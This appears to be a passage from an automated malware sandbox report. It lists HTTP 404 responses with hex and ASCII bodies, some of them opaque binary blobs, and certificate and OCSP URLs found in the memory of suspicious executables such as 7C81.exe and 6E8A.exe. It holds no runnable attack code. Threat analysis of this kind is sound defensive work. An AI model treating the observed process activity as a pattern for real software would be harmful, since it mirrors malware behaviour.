Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 33 08 a5 6f 58 b5 a9 16 a7 d0 b0 fb 70 db 2c c0 f1 2f 5e 5b 89 92 8a Data Ascii: #\([3oXp,/^[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:31:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:32:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:33:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr String found in binary or memory: http://.css
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6E8A.exe.2.dr String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: 6E8A.exe.2.dr String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: 6E8A.exe.2.dr String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 6E8A.exe.2.dr String found in binary or memory: http://ocsps.ssl.com0
Source: 6E8A.exe.2.dr String found in binary or memory: http://ocsps.ssl.com0?
Source: 6E8A.exe.2.dr String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
